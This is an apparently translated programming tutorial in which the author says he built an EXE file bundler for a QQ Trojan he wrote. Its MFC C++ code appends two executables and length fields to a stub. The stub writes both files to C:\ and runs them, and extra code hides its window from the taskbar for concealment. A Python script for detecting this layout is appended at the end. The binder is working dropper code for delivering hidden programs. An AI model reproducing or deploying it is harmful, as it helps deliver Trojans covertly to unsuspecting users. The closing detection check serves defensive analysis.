I wrote this file bundler in 2002; it was written to go with a QQ Trojan that I wrote myself. Later, I asked someone on a forum. I dug out the earlier program and wrote this document. When I finished with the hard disk today, I turned this article up. It is actually very simple.
File bundling can be used in many places, such as Trojans. You can also bundle a DLL behind the exe file when you release software, and then load the DLL dynamically when the exe is executed.
Compilation environment: Win2K VC6.
First, assume that we want to bundle Test1.exe and Test2.exe into a single file, Target.exe, so that running Target.exe runs Test1.exe and Test2.exe.
A small piece of background: if the header and body of a PE file are left unmodified and data is only added at the end of the file, the PE file still executes normally. You can try this by running copy /b test1.exe+test2.exe on the command line. After the command is executed, Test2.exe has been appended to the Test1.exe file, and the merged Test1.exe runs normally, but Test2.exe is not executed. OK, this is the problem we have to solve today. My idea is this: join three files together, so that Target.exe actually contains three files, where aaa.exe is a program we write ourselves, and Test1.exe and Test2.exe are the programs we want to bundle.
The structure is as follows:
---------------------------------------
| aaa.exe | TEST1.EXE | TEST2.EXE |
---------------------------------------
The entire file is called Target.exe. With this structure, only aaa.exe is actually executed when we run Target.exe, and since aaa.exe is written by us, we can make it do some extra work. What it has to do is:
1. Read the contents of Test2.exe and save them to C:\Test2.exe; read the contents of Test1.exe and save them to C:\Test1.exe.
2. Call CreateProcess to create two new processes that run Test1.exe and Test2.exe.
3. Call ExitProcess to end its own process.
This way, our goal is reached. At the same time, for the sake of concealment, we can keep aaa.exe from displaying its window.
But there is another problem: when reading, how can we tell which data is Test1.exe and which data is Test2.exe? Let's find a way to extend the structure above.
-----------------------------------------------------
| aaa.exe | TEST1.EXE | TEST2.EXE | LEN2 | LEN1 |
-----------------------------------------------------
At the very end of the file, add two fields that store the file length of Test1.exe and the file length of Test2.exe. Len2 and Len1 are each fixed at 30 bytes. That way, when aaa.exe is executed, it first reads the last two 30-byte fields, whose contents are the lengths of the two files, and can then read the contents of Test1.exe and Test2.exe exactly according to those lengths. Take a look at the key code of the aaa.exe program:

    CFile fSource(_pgmptr, CFile::modeRead | CFile::modeNoTruncate);
    // Get the file length of Target.exe
    int iSourceLength = fSource.GetLength();
    // Move the file pointer to the end of Test2.exe, where Len2 starts
    fSource.Seek(iSourceLength - 60, CFile::begin);
    char buffer[40];
    ZeroMemory(buffer, 40);
    fSource.Read(buffer, 30);            // read Len2, the length of Test2.exe
    int iTargetLength = atoi(buffer);
    // Move the file pointer to the beginning of Test2.exe
    fSource.Seek(iSourceLength - iTargetLength - 60, CFile::begin);
    // Create a new file, c:/test2.exe
    CFile fTarget("c:/TEST2.EXE", CFile::modeCreate | CFile::modeWrite | CFile::modeNoTruncate);
    char *pBuffer = new char[iTargetLength];   // allocate the buffer
    ZeroMemory(pBuffer, iTargetLength);
    fSource.Read(pBuffer, iTargetLength);      // read Test2.exe into the buffer
    fTarget.Write(pBuffer, iTargetLength);     // write the buffer to C:\Test2.exe
    delete[] pBuffer;

OK, now Test2.exe has been read out. Next, read the content of Test1.exe; the process is similar:

    fSource.Seek(iSourceLength - 30, CFile::begin);   // move the file pointer to the beginning of Len1
    ZeroMemory(buffer, 40);
    fSource.Read(buffer, 30);            // read Len1, the length of Test1.exe
    int fileLen = atoi(buffer);
    // Move the file pointer to the beginning of Test1.exe
    fSource.Seek(iSourceLength - 60 - fileLen - iTargetLength, CFile::begin);
    fTarget.Close();                     // close Test2.exe before reusing the object
    fTarget.Open("c:/TEST1.EXE", CFile::modeCreate | CFile::modeWrite | CFile::modeNoTruncate);
    pBuffer = new char[fileLen];
    ZeroMemory(pBuffer, fileLen);
    fSource.Read(pBuffer, fileLen);      // read Test1.exe into the buffer
    fTarget.Write(pBuffer, fileLen);     // write Test1.exe to C:\Test1.exe
    delete[] pBuffer;
    fSource.Close();
    fTarget.Close();

Now we use CreateProcess to create two new processes that run C:\Test1.exe and C:\Test2.exe. Creating a new process is very simple, so I will not write it out. This part is done, but the part that bundles the files has not been written yet. For that, create a new dialog-based program.

    // c:/aaa.exe is the aaa.exe we wrote above
    CFile fSource("c:/aaa.exe", CFile::modeReadWrite | CFile::modeNoTruncate);
    fSource.SeekToEnd();                 // move the file pointer to the end of the file

    // This block appends Test1.exe to the tail of aaa.exe
    CFile fFirstFile(m_FirstFile, CFile::modeRead | CFile::modeNoTruncate);
    int iLen = fFirstFile.GetLength();
    int len = iLen;                      // remember the length of Test1.exe
    char *pBuffer = new char[iLen];
    ZeroMemory(pBuffer, iLen);
    fFirstFile.Read(pBuffer, iLen);
    fSource.Write(pBuffer, iLen);
    fFirstFile.Close();
    delete[] pBuffer;

    // This block appends Test2.exe
    CFile fSecondFile(m_SecondFile, CFile::modeRead | CFile::modeNoTruncate);
    iLen = fSecondFile.GetLength();
    pBuffer = new char[iLen];
    ZeroMemory(pBuffer, iLen);
    fSecondFile.Read(pBuffer, iLen);
    fSource.Write(pBuffer, iLen);
    fSecondFile.Close();
    delete[] pBuffer;

    // Convert the length of Test2.exe to a string, pad it with spaces to
    // 30 characters, and append it to the file tail
    char tempBuffer[31];                 // 30 characters plus the terminating NUL
    ZeroMemory(tempBuffer, 31);
    itoa(iLen, tempBuffer, 10);
    while (strlen(tempBuffer) < 30) { strcat(tempBuffer, " "); }
    fSource.Write(tempBuffer, 30);

    // Convert the length of Test1.exe to a string, pad it with spaces to
    // 30 characters, and append it to the file tail
    ZeroMemory(tempBuffer, 31);
    itoa(len, tempBuffer, 10);
    while (strlen(tempBuffer) < 30) { strcat(tempBuffer, " "); }
    fSource.Write(tempBuffer, 30);
    fSource.Close();
    ::MessageBox(NULL, "Bundle Complete", "Tips", MB_ICONINFORMATION);

OK, so a new file, Target.exe, has been generated, as described above. After Target.exe is run, aaa.exe is executed first, and then Test1.exe and Test2.exe are executed. To improve concealment, we write the following code in the OnInitDialog() function of aaa.exe:

    ModifyStyleEx(WS_EX_APPWINDOW, WS_EX_TOOLWINDOW);
    ::MoveWindow(m_hWnd, 0, 0, 0, 0, TRUE);

This way aaa.exe shows no window and does not appear on the taskbar.
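
A triage check for the layout described above, as an added example that is not part of the original article: it computes where the PE headers say the file ends and tests whether the data after that point (the overlay) ends in the two 30-byte length fields. The function names and the tiny constructed sample file are assumptions made for illustration.

```python
import struct

def overlay_start(data: bytes) -> int:
    """File offset where the data described by the PE headers ends."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    n_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size          # section table follows the optional header
    end = table + 40 * n_sections
    for i in range(n_sections):
        raw_size, raw_ptr = struct.unpack_from("<II", data, table + 40 * i + 16)
        if raw_ptr:
            end = max(end, raw_ptr + raw_size)
    return end

def find_bundle(data: bytes):
    """Return [(offset, length, starts_with_MZ), ...] for the two payloads, or None."""
    start = overlay_start(data)
    if len(data) - start < 60:
        return None
    lengths = []
    for field in (data[-60:-30], data[-30:]):  # LEN2 first, then LEN1
        digits = field.rstrip(b" ")
        if not digits.isdigit():
            return None
        lengths.append(int(digits))
    len2, len1 = lengths
    off2 = len(data) - 60 - len2
    off1 = off2 - len1
    if off1 < start:                           # lengths do not fit inside the overlay
        return None
    return [(o, n, data[o:o + 2] == b"MZ") for o, n in ((off1, len1), (off2, len2))]

def tiny_pe(body: bytes) -> bytes:
    """Constructed sample input: minimal MZ/PE headers, one section holding `body`."""
    hdr = bytearray(0x40 + 24 + 40)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)    # e_lfanew
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<H", hdr, 0x46, 1)       # NumberOfSections = 1
    struct.pack_into("<II", hdr, 0x40 + 24 + 16, len(body), len(hdr))  # raw size, raw pointer
    return bytes(hdr) + body

# Constructed file in the layout above: stub | payload 1 | payload 2 | LEN2 | LEN1
STUB, P1, P2 = tiny_pe(b"S" * 16), tiny_pe(b"one"), tiny_pe(b"two!")
SAMPLE = STUB + P1 + P2 + b"%-30d%-30d" % (len(P2), len(P1))

if __name__ == "__main__":
    print(overlay_start(SAMPLE), find_bundle(SAMPLE), find_bundle(STUB))
```

Installers, self-extracting archives and signed binaries also carry data past the last section, so a non-empty overlay on its own is only a triage signal; the matching length trailer with payloads that start with MZ is the indicator specific to this layout.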